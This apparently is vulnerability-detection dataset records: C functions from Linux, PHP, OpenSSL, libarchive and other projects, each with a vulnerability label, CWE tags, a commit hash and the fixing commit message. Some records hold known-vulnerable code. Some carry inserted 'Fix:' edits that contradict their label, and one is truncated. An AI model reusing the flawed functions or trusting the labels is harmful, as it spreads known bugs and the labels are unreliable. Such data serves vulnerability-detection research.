usb: max-3421: Prevent corruption of freed memory The MAX-3421 USB driver remembers the state of the USB toggles for a device/endpoint. To save SPI writes, this was only done when a new device/endpoint was being used. Unfortunately, if the old device was removed, this would cause writes to freed memory. To fix this, a simpler scheme is used. The toggles are read from hardware when a URB is completed, and the toggles are always written to hardware when any URB transaction is started. This will cause a few more SPI transactions, but causes no kernel panics. Fixes: 2d53139f3162 ("Add support for using a MAX3421E chip as a host driver.") Cc: stable <[email protected]> Signed-off-by: Mark Tomlinson <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Greg Kroah-Hartman <[email protected]>
/*
 * kvm_destroy_vm() - tear down a VM after its last reference is dropped.
 *
 * Ordering matters throughout: arch events are synced and the VM is
 * unlinked from the global list before any per-VM state is freed, the MMU
 * notifier is unregistered before memslots are released, and the mm is
 * dropped only at the very end.
 */
static void kvm_destroy_vm(struct kvm *kvm)
{
	int i;
	struct mm_struct *mm = kvm->mm;

	/* Stop PM notifications and announce the destruction to userspace
	 * listeners and debugfs before teardown begins. */
	kvm_destroy_pm_notifier(kvm);
	kvm_uevent_notify_change(KVM_EVENT_DESTROY_VM, kvm);
	kvm_destroy_vm_debugfs(kvm);
	/* Let arch code drain any asynchronous per-VM work. */
	kvm_arch_sync_events(kvm);
	/* Remove the VM from the global list under kvm_lock. */
	mutex_lock(&kvm_lock);
	list_del(&kvm->vm_list);
	mutex_unlock(&kvm_lock);
	kvm_arch_pre_destroy_vm(kvm);

	kvm_free_irq_routing(kvm);
	/* Destroy every I/O bus and clear the pointer so nothing can
	 * dispatch through a freed bus. */
	for (i = 0; i < KVM_NR_BUSES; i++) {
		struct kvm_io_bus *bus = kvm_get_bus(kvm, i);

		if (bus)
			kvm_io_bus_destroy(bus);
		kvm->buses[i] = NULL;
	}
	kvm_coalesced_mmio_free(kvm);
#if defined(CONFIG_MMU_NOTIFIER) && defined(KVM_ARCH_WANT_MMU_NOTIFIER)
	mmu_notifier_unregister(&kvm->mmu_notifier, kvm->mm);
	/*
	 * At this point, pending calls to invalidate_range_start()
	 * have completed but no more MMU notifiers will run, so
	 * mn_active_invalidate_count may remain unbalanced.
	 * No threads can be waiting in install_new_memslots as the
	 * last reference on KVM has been dropped, but freeing
	 * memslots would deadlock without this manual intervention.
	 */
	WARN_ON(rcuwait_active(&kvm->mn_memslots_update_rcuwait));
	kvm->mn_active_invalidate_count = 0;
#else
	kvm_arch_flush_shadow_all(kvm);
#endif
	kvm_arch_destroy_vm(kvm);
	kvm_destroy_devices(kvm);
	/* Free both generations of memslots for each address space. */
	for (i = 0; i < KVM_ADDRESS_SPACE_NUM; i++) {
		kvm_free_memslots(kvm, &kvm->__memslots[i][0]);
		kvm_free_memslots(kvm, &kvm->__memslots[i][1]);
	}
	cleanup_srcu_struct(&kvm->irq_srcu);
	cleanup_srcu_struct(&kvm->srcu);
	kvm_arch_free_vm(kvm);
	preempt_notifier_dec();
	hardware_disable_all();
	/* Drop the mm reference taken at VM creation. */
	mmdrop(mm);
	module_put(kvm_chardev_ops.owner);
	/* NOTE(review): this record appears truncated — the function's
	 * closing brace is missing from the snippet. */
1
[ "CWE-459" ]
linux
683412ccf61294d727ead4a73d97397396e69a6b
135,302,587,656,361,500,000,000,000,000,000,000,000
52
KVM: SEV: add cache flush to solve SEV cache incoherency issues Flush the CPU caches when memory is reclaimed from an SEV guest (where reclaim also includes it being unmapped from KVM's memslots). Due to lack of coherency for SEV encrypted memory, failure to flush results in silent data corruption if userspace is malicious/broken and doesn't ensure SEV guest memory is properly pinned and unpinned. Cache coherency is not enforced across the VM boundary in SEV (AMD APM vol.2 Section 15.34.7). Confidential cachelines, generated by confidential VM guests have to be explicitly flushed on the host side. If a memory page containing dirty confidential cachelines was released by VM and reallocated to another user, the cachelines may corrupt the new user at a later time. KVM takes a shortcut by assuming all confidential memory remain pinned until the end of VM lifetime. Therefore, KVM does not flush cache at mmu_notifier invalidation events. Because of this incorrect assumption and the lack of cache flushing, malicous userspace can crash the host kernel: creating a malicious VM and continuously allocates/releases unpinned confidential memory pages when the VM is running. Add cache flush operations to mmu_notifier operations to ensure that any physical memory leaving the guest VM get flushed. In particular, hook mmu_notifier_invalidate_range_start and mmu_notifier_release events and flush cache accordingly. The hook after releasing the mmu lock to avoid contention with other vCPUs. Cc: [email protected] Suggested-by: Sean Christpherson <[email protected]> Reported-by: Mingwei Zhang <[email protected]> Signed-off-by: Mingwei Zhang <[email protected]> Message-Id: <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]>
/*
 * HIF power-on hook for the ath6kl USB back end: (re)starts HIF-layer
 * processing for this device.  Always reports success.
 */
static int ath6kl_usb_power_on(struct ath6kl *ar)
{
	hif_start(ar);
	return 0;
}
0
[ "CWE-476" ]
linux
39d170b3cb62ba98567f5c4f40c27b5864b304e5
130,573,669,732,034,500,000,000,000,000,000,000,000
5
ath6kl: fix a NULL-ptr-deref bug in ath6kl_usb_alloc_urb_from_pipe() The `ar_usb` field of `ath6kl_usb_pipe_usb_pipe` objects are initialized to point to the containing `ath6kl_usb` object according to endpoint descriptors read from the device side, as shown below in `ath6kl_usb_setup_pipe_resources`: for (i = 0; i < iface_desc->desc.bNumEndpoints; ++i) { endpoint = &iface_desc->endpoint[i].desc; // get the address from endpoint descriptor pipe_num = ath6kl_usb_get_logical_pipe_num(ar_usb, endpoint->bEndpointAddress, &urbcount); ...... // select the pipe object pipe = &ar_usb->pipes[pipe_num]; // initialize the ar_usb field pipe->ar_usb = ar_usb; } The driver assumes that the addresses reported in endpoint descriptors from device side to be complete. If a device is malicious and does not report complete addresses, it may trigger NULL-ptr-deref `ath6kl_usb_alloc_urb_from_pipe` and `ath6kl_usb_free_urb_to_pipe`. This patch fixes the bug by preventing potential NULL-ptr-deref (CVE-2019-15098). Signed-off-by: Hui Peng <[email protected]> Reported-by: Hui Peng <[email protected]> Reported-by: Mathias Payer <[email protected]> Reviewed-by: Greg Kroah-Hartman <[email protected]> Signed-off-by: Kalle Valo <[email protected]>
/*
 * cull_entries() - compact the NIC database file open on |fd|.
 *
 * The whole file is mmap'ed read/write.  Pass 1 walks every line matching
 * (me, t, br) via find_line() and records its position, marking lines
 * whose NIC no longer exists for removal.  Pass 2 copies the surviving
 * lines down over the front of the mapping and the file is truncated to
 * the new length.
 *
 * Returns true on success (an empty file counts as success), false on
 * fstat/mmap or allocation failure.
 */
static bool cull_entries(int fd, char *me, char *t, char *br)
{
	struct stat sb;
	char *buf, *p, *e, *nic;
	off_t len;
	struct entry_line *entry_lines = NULL;
	int i, n = 0;

	/* Scratch buffer handed to get_nic_from_line(); assumes NIC names
	 * fit in 100 bytes — TODO confirm against get_nic_from_line(). */
	nic = alloca(100);

	if (fstat(fd, &sb) < 0) {
		fprintf(stderr, "Failed to fstat: %s\n", strerror(errno));
		return false;
	}
	len = sb.st_size;
	if (len == 0)
		return true;

	buf = mmap(NULL, len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
	if (buf == MAP_FAILED) {
		fprintf(stderr, "Failed to create mapping: %s\n", strerror(errno));
		return false;
	}

	/* Pass 1: index the matching lines and decide which to keep. */
	p = buf;
	e = buf + len;
	while ((p = find_line(p, e, me, t, br)) != NULL) {
		struct entry_line *newe = realloc(entry_lines, sizeof(*entry_lines)*(n+1));
		if (!newe) {
			free(entry_lines);
			/* Fix: unmap the file as well — the original leaked
			 * the entire mapping on allocation failure. */
			munmap(buf, len);
			return false;
		}
		entry_lines = newe;
		entry_lines[n].start = p;
		entry_lines[n].len = get_eol(p, e) - entry_lines[n].start;
		entry_lines[n].keep = true;
		n++;
		/* NOTE(review): on this path p is not advanced; this relies
		 * on find_line() making forward progress — confirm. */
		if (!get_nic_from_line(p, &nic))
			continue;
		/* Drop entries whose interface has disappeared. */
		if (nic && !nic_exists(nic))
			entry_lines[n-1].keep = false;
		p += entry_lines[n-1].len + 1;
		if (p >= e)
			break;
	}

	/* Pass 2: compact the kept lines to the front of the mapping. */
	p = buf;
	for (i = 0; i < n; i++) {
		if (!entry_lines[i].keep)
			continue;
		memcpy(p, entry_lines[i].start, entry_lines[i].len);
		p += entry_lines[i].len;
		*p = '\n';
		p++;
	}
	free(entry_lines);

	munmap(buf, sb.st_size);
	if (ftruncate(fd, p-buf))
		fprintf(stderr, "Failed to set new file size\n");
	return true;
}
0
[ "CWE-284", "CWE-862" ]
lxc
16af238036a5464ae8f2420ed3af214f0de875f9
143,931,741,631,942,970,000,000,000,000,000,000,000
59
CVE-2017-5985: Ensure target netns is caller-owned Before this commit, lxc-user-nic could potentially have been tricked into operating on a network namespace over which the caller did not hold privilege. This commit ensures that the caller is privileged over the network namespace by temporarily dropping privilege. Launchpad: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1654676 Reported-by: Jann Horn <[email protected]> Signed-off-by: Christian Brauner <[email protected]>
/*
 * Drop one open reference on the device; when the last opener goes away,
 * abort all outstanding transfers and clamp the counter at zero so it can
 * never go negative.
 */
static void adu_release_internal(struct adu_device *dev)
{
	int remaining;

	/* decrement our usage count for the device */
	remaining = --dev->open_count;
	dev_dbg(&dev->udev->dev, "%s : open count %d\n", __func__,
		dev->open_count);

	if (remaining > 0)
		return;

	/* Last reference gone: cancel pending I/O and reset the count. */
	adu_abort_transfers(dev);
	dev->open_count = 0;
}
0
[ "CWE-416" ]
linux
44efc269db7929f6275a1fa927ef082e533ecde0
262,098,219,007,398,360,000,000,000,000,000,000,000
11
USB: adutux: fix use-after-free on disconnect The driver was clearing its struct usb_device pointer, which it used as an inverted disconnected flag, before deregistering the character device and without serialising against racing release(). This could lead to a use-after-free if a racing release() callback observes the cleared pointer and frees the driver data before disconnect() is finished with it. This could also lead to NULL-pointer dereferences in a racing open(). Fixes: f08812d5eb8f ("USB: FIx locks and urb->status in adutux (updated)") Cc: stable <[email protected]> # 2.6.24 Reported-by: [email protected] Tested-by: [email protected] Signed-off-by: Johan Hovold <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Greg Kroah-Hartman <[email protected]>
/*
 * Deserialize the property payload of an object during unserialize() and
 * invoke its __wakeup() hook, if the class defines one.
 *
 * Returns non-zero on success, 0 if the nested property data could not be
 * processed.
 */
static inline int object_common2(UNSERIALIZE_PARAMETER, long elements)
{
	zval *retval_ptr = NULL;
	zval fname;

	/* Populate the object's property table from the next |elements|
	 * key/value pairs in the serialized stream. */
	if (!process_nested_data(UNSERIALIZE_PASSTHRU, Z_OBJPROP_PP(rval), elements)) {
		return 0;
	}

	/* Call __wakeup() unless this is the incomplete-class placeholder
	 * entry (PHP_IC_ENTRY) or the class has no such method. */
	if (Z_OBJCE_PP(rval) != PHP_IC_ENTRY &&
	    zend_hash_exists(&Z_OBJCE_PP(rval)->function_table, "__wakeup", sizeof("__wakeup"))) {
		INIT_PZVAL(&fname);
		ZVAL_STRINGL(&fname, "__wakeup", sizeof("__wakeup") - 1, 0);
		/* The call result is deliberately ignored here; a failing
		 * __wakeup() is not treated as a fatal unserialize error. */
		call_user_function_ex(CG(function_table), rval, &fname, &retval_ptr, 0, 0, 1, NULL TSRMLS_CC);
	}

	/* Release __wakeup()'s return value, if one was produced. */
	if (retval_ptr)
		zval_ptr_dtor(&retval_ptr);

	/* Presumably consumes the terminator of the nested object payload —
	 * confirm against finish_nested_data(). */
	return finish_nested_data(UNSERIALIZE_PASSTHRU);
}
1
[]
php-src
d3fdacb99fab186654bdf2f3adb17d9c628202f0
189,616,282,498,630,130,000,000,000,000,000,000,000
22
- Fixed #55798: serialize followed by unserialize with numeric object prop. gives integer prop.
/*
 * Return the next ACL entry of |acl| whose type matches |want_type|,
 * filling *type/*permset/*tag/*id/*name for the caller.
 *
 * Iteration state lives in acl->acl_state: 0 means no entries are
 * available; the three synthetic "access" entries (USER_OBJ, GROUP_OBJ,
 * OTHER) are emitted first, derived from the classic rwx triplets in
 * acl->mode; afterwards acl_state is -1 and entries come from the linked
 * list at acl->acl_p.
 *
 * Returns ARCHIVE_OK per entry, ARCHIVE_EOF at the end, ARCHIVE_WARN when
 * no entries exist, and ARCHIVE_FATAL on allocation failure while
 * converting the entry name.
 * NOTE(review): the return-type line precedes this snippet and is not part
 * of the record.
 */
archive_acl_next(struct archive *a, struct archive_acl *acl, int want_type,
    int *type, int *permset, int *tag, int *id, const char **name)
{
	*name = NULL;
	*id = -1;

	/*
	 * The acl_state is either zero (no entries available), -1
	 * (reading from list), or an entry type (retrieve that type
	 * from ae_stat.aest_mode).
	 */
	if (acl->acl_state == 0)
		return (ARCHIVE_WARN);

	/* The first three access entries are special. */
	if ((want_type & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
		switch (acl->acl_state) {
		case ARCHIVE_ENTRY_ACL_USER_OBJ:
			/* Owner permissions: bits 8-6 of the mode. */
			*permset = (acl->mode >> 6) & 7;
			*type = ARCHIVE_ENTRY_ACL_TYPE_ACCESS;
			*tag = ARCHIVE_ENTRY_ACL_USER_OBJ;
			acl->acl_state = ARCHIVE_ENTRY_ACL_GROUP_OBJ;
			return (ARCHIVE_OK);
		case ARCHIVE_ENTRY_ACL_GROUP_OBJ:
			/* Group permissions: bits 5-3 of the mode. */
			*permset = (acl->mode >> 3) & 7;
			*type = ARCHIVE_ENTRY_ACL_TYPE_ACCESS;
			*tag = ARCHIVE_ENTRY_ACL_GROUP_OBJ;
			acl->acl_state = ARCHIVE_ENTRY_ACL_OTHER;
			return (ARCHIVE_OK);
		case ARCHIVE_ENTRY_ACL_OTHER:
			/* "Other" permissions: low three mode bits; switch
			 * to list iteration afterwards. */
			*permset = acl->mode & 7;
			*type = ARCHIVE_ENTRY_ACL_TYPE_ACCESS;
			*tag = ARCHIVE_ENTRY_ACL_OTHER;
			acl->acl_state = -1;
			acl->acl_p = acl->acl_head;
			return (ARCHIVE_OK);
		default:
			break;
		}
	}

	/* Skip list entries whose type the caller did not ask for. */
	while (acl->acl_p != NULL && (acl->acl_p->type & want_type) == 0)
		acl->acl_p = acl->acl_p->next;
	if (acl->acl_p == NULL) {
		/* Exhausted: reset state and clear all outputs. */
		acl->acl_state = 0;
		*type = 0;
		*permset = 0;
		*tag = 0;
		*id = -1;
		*name = NULL;
		return (ARCHIVE_EOF); /* End of ACL entries. */
	}
	*type = acl->acl_p->type;
	*permset = acl->acl_p->permset;
	*tag = acl->acl_p->tag;
	*id = acl->acl_p->id;
	/* Name conversion may fail; only ENOMEM is fatal, otherwise the
	 * entry is returned without a name. */
	if (archive_mstring_get_mbs(a, &acl->acl_p->name, name) != 0) {
		if (errno == ENOMEM)
			return (ARCHIVE_FATAL);
		*name = NULL;
	}
	acl->acl_p = acl->acl_p->next;
	return (ARCHIVE_OK);
}
0
[ "CWE-476" ]
libarchive
15bf44fd2c1ad0e3fd87048b3fcc90c4dcff1175
157,346,678,687,934,190,000,000,000,000,000,000,000
64
Skip 0-length ACL fields Currently, it is possible to create an archive that crashes bsdtar with a malformed ACL: Program received signal SIGSEGV, Segmentation fault. archive_acl_from_text_l (acl=<optimised out>, text=0x7e2e92 "", want_type=<optimised out>, sc=<optimised out>) at libarchive/archive_acl.c:1726 1726 switch (*s) { (gdb) p n $1 = 1 (gdb) p field[n] $2 = {start = 0x0, end = 0x0} Stop this by checking that the length is not zero before beginning the switch statement. I am pretty sure this is the bug mentioned in the qsym paper [1], and I was able to replicate it with a qsym + AFL + afl-rb setup. [1] https://www.usenix.org/conference/usenixsecurity18/presentation/yun
/*
 * Decode one JPEG-2000 tile: entropy-decode its code blocks, dequantize,
 * run the inverse wavelet and (optional) inverse intercomponent
 * transforms, round/level-shift/clip the samples, and write each
 * component into the output image.
 *
 * Returns 0 on success, a negative value on failure.
 */
static int jpc_dec_tiledecode(jpc_dec_t *dec, jpc_dec_tile_t *tile)
{
	int i;
	int j;
	jpc_dec_tcomp_t *tcomp;
	jpc_dec_rlvl_t *rlvl;
	jpc_dec_band_t *band;
	int compno;
	int rlvlno;
	int bandno;
	int adjust;
	int v;
	jpc_dec_ccp_t *ccp;
	jpc_dec_cmpt_t *cmpt;

	/* Entropy-decode all code blocks of the tile. */
	if (jpc_dec_decodecblks(dec, tile)) {
		jas_eprintf("jpc_dec_decodecblks failed\n");
		return -1;
	}

	/* Perform dequantization. */
	for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps;
	  ++compno, ++tcomp) {
		ccp = &tile->cp->ccps[compno];
		for (rlvlno = 0, rlvl = tcomp->rlvls; rlvlno < tcomp->numrlvls;
		  ++rlvlno, ++rlvl) {
			/* Skip resolution levels/bands with no data. */
			if (!rlvl->bands) {
				continue;
			}
			for (bandno = 0, band = rlvl->bands;
			  bandno < rlvl->numbands; ++bandno, ++band) {
				if (!band->data) {
					continue;
				}
				/* Undo region-of-interest shifting first,
				 * then dequantize (real mode only). */
				jpc_undo_roi(band->data, band->roishift,
				  ccp->roishift - band->roishift, band->numbps);
				if (tile->realmode) {
					jas_matrix_asl(band->data, JPC_FIX_FRACBITS);
					jpc_dequantize(band->data, band->absstepsize);
				}
			}
		}
	}

	/* Apply an inverse wavelet transform if necessary. */
	for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps;
	  ++compno, ++tcomp) {
		ccp = &tile->cp->ccps[compno];
		jpc_tsfb_synthesize(tcomp->tsfb, tcomp->data);
	}

	/* Apply an inverse intercomponent transform if necessary
	 * (reversible or irreversible color transform; both require
	 * exactly three components). */
	switch (tile->cp->mctid) {
	case JPC_MCT_RCT:
		assert(dec->numcomps == 3);
		jpc_irct(tile->tcomps[0].data, tile->tcomps[1].data,
		  tile->tcomps[2].data);
		break;
	case JPC_MCT_ICT:
		assert(dec->numcomps == 3);
		jpc_iict(tile->tcomps[0].data, tile->tcomps[1].data,
		  tile->tcomps[2].data);
		break;
	}

	/* Perform rounding and convert to integer values. */
	if (tile->realmode) {
		for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps;
		  ++compno, ++tcomp) {
			for (i = 0; i < jas_matrix_numrows(tcomp->data); ++i) {
				for (j = 0; j < jas_matrix_numcols(tcomp->data); ++j) {
					v = jas_matrix_get(tcomp->data, i, j);
					v = jpc_fix_round(v);
					jas_matrix_set(tcomp->data, i, j, jpc_fixtoint(v));
				}
			}
		}
	}

	/* Perform level shift.  Unsigned components are offset by half the
	 * dynamic range of their precision. */
	for (compno = 0, tcomp = tile->tcomps, cmpt = dec->cmpts; compno <
	  dec->numcomps; ++compno, ++tcomp, ++cmpt) {
		adjust = cmpt->sgnd ? 0 : (1 << (cmpt->prec - 1));
		for (i = 0; i < jas_matrix_numrows(tcomp->data); ++i) {
			for (j = 0; j < jas_matrix_numcols(tcomp->data); ++j) {
				*jas_matrix_getref(tcomp->data, i, j) += adjust;
			}
		}
	}

	/* Perform clipping to the valid sample range for each component's
	 * signedness and precision. */
	for (compno = 0, tcomp = tile->tcomps, cmpt = dec->cmpts; compno <
	  dec->numcomps; ++compno, ++tcomp, ++cmpt) {
		jpc_fix_t mn;
		jpc_fix_t mx;
		mn = cmpt->sgnd ? (-(1 << (cmpt->prec - 1))) : (0);
		mx = cmpt->sgnd ? ((1 << (cmpt->prec - 1)) - 1) :
		  ((1 << cmpt->prec) - 1);
		jas_matrix_clip(tcomp->data, mn, mx);
	}
	/* XXX need to free tsfb struct */

	/* Write the data for each component of the image. */
	for (compno = 0, tcomp = tile->tcomps, cmpt = dec->cmpts; compno <
	  dec->numcomps; ++compno, ++tcomp, ++cmpt) {
		if (jas_image_writecmpt(dec->image, compno, tcomp->xstart -
		  JPC_CEILDIV(dec->xstart, cmpt->hstep), tcomp->ystart -
		  JPC_CEILDIV(dec->ystart, cmpt->vstep), jas_matrix_numcols(
		  tcomp->data), jas_matrix_numrows(tcomp->data), tcomp->data)) {
			jas_eprintf("write component failed\n");
			return -4;
		}
	}

	return 0;
}
0
[ "CWE-189" ]
jasper
5dbe57e4808bea4b83a97e2f4aaf8c91ab6fdecb
321,893,140,666,814,660,000,000,000,000,000,000,000
119
CVE-2014-9029
	/* NOTE(review): this record begins with the tail of the previous
	 * function in the original file; kept verbatim. */
	return err;
}

/*
 * Handle a netlink logout-flashnode request: look up the flashnode
 * session identified by (host_no, flashnode_idx) in |ev|, find its
 * connection, and ask the transport to log it out.
 *
 * Returns 0 on success, -ENOSYS if the transport has no handler, -ENODEV
 * if the host/flashnode/connection cannot be found, or the transport's
 * error code.
 */
static int iscsi_logout_flashnode(struct iscsi_transport *transport,
				  struct iscsi_uevent *ev)
{
	struct Scsi_Host *shost;
	struct iscsi_bus_flash_session *fnode_sess;
	struct iscsi_bus_flash_conn *fnode_conn;
	struct device *dev;
	uint32_t idx;
	int err = 0;

	/* The transport must implement the operation at all. */
	if (!transport->logout_flashnode) {
		err = -ENOSYS;
		goto exit_logout_fnode;
	}

	shost = scsi_host_lookup(ev->u.logout_flashnode.host_no);
	if (!shost) {
		pr_err("%s could not find host no %u\n",
		       __func__, ev->u.logout_flashnode.host_no);
		err = -ENODEV;
		goto put_host;
	}

	idx = ev->u.logout_flashnode.flashnode_idx;
	fnode_sess = iscsi_get_flashnode_by_index(shost, idx);
	if (!fnode_sess) {
		pr_err("%s could not find flashnode %u for host no %u\n",
		       __func__, idx, ev->u.logout_flashnode.host_no);
		err = -ENODEV;
		goto put_host;
	}

	dev = iscsi_find_flashnode_conn(fnode_sess);
	if (!dev) {
		err = -ENODEV;
		goto put_sess;
	}

	fnode_conn = iscsi_dev_to_flash_conn(dev);
	err = transport->logout_flashnode(fnode_sess, fnode_conn);
	/* Balance the reference taken by iscsi_find_flashnode_conn(). */
	put_device(dev);

put_sess:
	put_device(&fnode_sess->dev);

put_host:
	scsi_host_put(shost);
	/* NOTE(review): record is truncated here — the exit_logout_fnode
	 * label, final return and closing brace are missing from this
	 * snippet. */
0
[ "CWE-787" ]
linux
ec98ea7070e94cc25a422ec97d1421e28d97b7ee
162,779,946,136,049,800,000,000,000,000,000,000,000
52
scsi: iscsi: Ensure sysfs attributes are limited to PAGE_SIZE As the iSCSI parameters are exported back through sysfs, it should be enforcing that they never are more than PAGE_SIZE (which should be more than enough) before accepting updates through netlink. Change all iSCSI sysfs attributes to use sysfs_emit(). Cc: [email protected] Reported-by: Adam Nichols <[email protected]> Reviewed-by: Lee Duncan <[email protected]> Reviewed-by: Greg Kroah-Hartman <[email protected]> Reviewed-by: Mike Christie <[email protected]> Signed-off-by: Chris Leech <[email protected]> Signed-off-by: Martin K. Petersen <[email protected]>
// Close the PAM session if one is open: end the session and drop the
// credentials established for it.  If no session was open, warn and fall
// back to the base-class behaviour.
bool PamBackend::closeSession() {
    if (!m_pam->isOpen()) {
        qWarning() << "[PAM] Asked to close the session but it wasn't previously open";
        return Backend::closeSession();
    }

    qDebug() << "[PAM] Closing session";
    m_pam->closeSession();
    m_pam->setCred(PAM_DELETE_CRED);
    return true;
}
0
[ "CWE-613", "CWE-287", "CWE-284" ]
sddm
147cec383892d143b5e02daa70f1e7def50f5d98
280,000,254,220,522,240,000,000,000,000,000,000,000
10
Fix authentication when reusing an existing session - Check the success value before unlocking the session - Don't attempt to use the nonexistant "sddm-check" PAM service
/*
 * tls1_set_sigalgs() - install the configured signature-algorithm list.
 *
 * |salg| holds |salglen| integers forming (hash NID, signature NID)
 * pairs.  Each pair is validated against the TLS 1.2 lookup tables and
 * stored in a freshly allocated TLS_SIGALGS array which replaces any
 * previous configuration on |c|.
 *
 * Returns 1 on success, 0 on failure (odd-length list, unknown
 * algorithm, or allocation failure); on failure |c| is left unchanged.
 */
int tls1_set_sigalgs(CERT *c, const int *salg, size_t salglen)
	{
	TLS_SIGALGS *sigalgs, *sptr;
	int rhash, rsign;
	size_t i;

	/* The list must be (hash, sig) pairs, i.e. even-length. */
	if (salglen & 1)
		return 0;
	salglen /= 2;
	/* Fix: reject lists large enough to wrap the allocation size —
	 * size_t overflow in the multiplication below would under-allocate
	 * and let the loop write past the buffer. */
	if (salglen > ((size_t)-1) / sizeof(TLS_SIGALGS))
		return 0;
	sigalgs = OPENSSL_malloc(sizeof(TLS_SIGALGS) * salglen);
	if (sigalgs == NULL)
		return 0;

	for (i = 0, sptr = sigalgs; i < salglen; i++, sptr++)
		{
		sptr->hash_nid = *salg++;
		sptr->sign_nid = *salg++;
		/* Both NIDs must be known TLS 1.2 algorithms. */
		rhash = tls12_find_id(sptr->hash_nid, tls12_md,
					sizeof(tls12_md)/sizeof(tls12_lookup));
		rsign = tls12_find_id(sptr->sign_nid, tls12_sig,
					sizeof(tls12_sig)/sizeof(tls12_lookup));
		if (rhash == -1 || rsign == -1)
			goto err;
		/* Cache the combined signature OID; NID_undef if no
		 * composite algorithm exists for this pair. */
		if (!OBJ_find_sigid_by_algs(&sptr->signandhash_nid,
					sptr->hash_nid, sptr->sign_nid))
			sptr->signandhash_nid = NID_undef;
		sptr->rhash = rhash;
		sptr->rsign = rsign;
		}

	/* Replace any previously configured list. */
	if (c->conf_sigalgs)
		OPENSSL_free(c->conf_sigalgs);
	c->conf_sigalgs = sigalgs;
	c->conf_sigalgslen = salglen;
	return 1;

	err:
	OPENSSL_free(sigalgs);
	return 0;
	}
1
[]
openssl
c70a1fee71119a9005b1f304a3bf47694b4a53ac
4,146,853,087,409,819,000,000,000,000,000,000,000
42
Reorganise supported signature algorithm extension processing. Only store encoded versions of peer and configured signature algorithms. Determine shared signature algorithms and cache the result along with NID equivalents of each algorithm. (backport from HEAD)
/*
 * Trivial match predicate: reports a match for any device.  Both
 * arguments are ignored.
 */
int device_match_any(struct device *dev, const void *unused)
{
	return 1;
}
0
[ "CWE-787" ]
linux
aa838896d87af561a33ecefea1caa4c15a68bc47
318,366,075,033,947,320,000,000,000,000,000,000,000
4
drivers core: Use sysfs_emit and sysfs_emit_at for show(device *...) functions Convert the various sprintf fmaily calls in sysfs device show functions to sysfs_emit and sysfs_emit_at for PAGE_SIZE buffer safety. Done with: $ spatch -sp-file sysfs_emit_dev.cocci --in-place --max-width=80 . And cocci script: $ cat sysfs_emit_dev.cocci @@ identifier d_show; identifier dev, attr, buf; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... return - sprintf(buf, + sysfs_emit(buf, ...); ...> } @@ identifier d_show; identifier dev, attr, buf; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... return - snprintf(buf, PAGE_SIZE, + sysfs_emit(buf, ...); ...> } @@ identifier d_show; identifier dev, attr, buf; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... return - scnprintf(buf, PAGE_SIZE, + sysfs_emit(buf, ...); ...> } @@ identifier d_show; identifier dev, attr, buf; expression chr; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... return - strcpy(buf, chr); + sysfs_emit(buf, chr); ...> } @@ identifier d_show; identifier dev, attr, buf; identifier len; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... len = - sprintf(buf, + sysfs_emit(buf, ...); ...> return len; } @@ identifier d_show; identifier dev, attr, buf; identifier len; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... len = - snprintf(buf, PAGE_SIZE, + sysfs_emit(buf, ...); ...> return len; } @@ identifier d_show; identifier dev, attr, buf; identifier len; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... len = - scnprintf(buf, PAGE_SIZE, + sysfs_emit(buf, ...); ...> return len; } @@ identifier d_show; identifier dev, attr, buf; identifier len; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... 
- len += scnprintf(buf + len, PAGE_SIZE - len, + len += sysfs_emit_at(buf, len, ...); ...> return len; } @@ identifier d_show; identifier dev, attr, buf; expression chr; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { ... - strcpy(buf, chr); - return strlen(buf); + return sysfs_emit(buf, chr); } Signed-off-by: Joe Perches <[email protected]> Link: https://lore.kernel.org/r/3d033c33056d88bbe34d4ddb62afd05ee166ab9a.1600285923.git.joe@perches.com Signed-off-by: Greg Kroah-Hartman <[email protected]>
static bool fm10k_alloc_mapped_page(struct fm10k_ring *rx_ring, struct fm10k_rx_buffer *bi) { struct page *page = bi->page; dma_addr_t dma; /* Only page will be NULL if buffer was consumed */ if (likely(page)) return true; /* alloc new page for storage */ page = dev_alloc_page(); if (unlikely(!page)) { rx_ring->rx_stats.alloc_failed++; return false; } /* map page for use */ dma = dma_map_page(rx_ring->dev, page, 0, PAGE_SIZE, DMA_FROM_DEVICE); /* if mapping failed free memory back to system since * there isn't much point in holding memory we can't use */ if (dma_mapping_error(rx_ring->dev, dma)) { __free_page(page); rx_ring->rx_stats.alloc_failed++; return false; } bi->dma = dma; bi->page = page; bi->page_offset = 0; return true; }
0
[ "CWE-476" ]
linux
01ca667133d019edc9f0a1f70a272447c84ec41f
296,239,010,784,542,900,000,000,000,000,000,000,000
36
